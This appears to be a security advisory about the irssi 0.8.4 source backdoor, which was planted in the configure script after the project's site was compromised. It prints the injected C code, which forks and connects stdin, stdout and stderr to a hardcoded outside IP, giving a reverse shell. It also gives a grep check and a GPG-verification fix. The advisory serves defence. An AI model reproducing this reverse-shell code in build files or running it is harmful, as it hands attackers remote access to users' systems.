COMMAND

	irssi backdoor

SYSTEMS AFFECTED

	0.8.4

PROBLEM

	Accodringly with irssi homepage [http://www.irssi.org],  main  web  site
	have been cracked  and  source  code  backdoored  for  last  two  months
	(binary not impacted).
	

	This code was found from configure - it forks a  new  process,  connects
	to some server and gives stdin/out/err to it (ie. giving  remote  access
	to your account):
	

	       int s;

	        struct sockaddr_in sa;

	        switch(fork()) { case 0: break; default: exit(0); }

	        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {

	                exit(1);

	        }

	 /* HP/UX 9 (%@#!) writes to sscanf strings */

	        memset(&sa, 0, sizeof(sa));

	        sa.sin_family = AF_INET;

	        sa.sin_port = htons(6667);

	        sa.sin_addr.s_addr = inet_addr(\"204.120.36.206\");

	        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {

	                exit(1);

	        }

	        dup2(s, 0); dup2(s, 1); dup2(s, 2);

	

	If you still have the irssi sources, you can  see  if  you\'re  affected
	with grep SOCK_STREAM configure -  if  it  returns  anything,  something
	might have been done to your system.
	

	

SOLUTION

	Upload source again - and check them with author GPG key.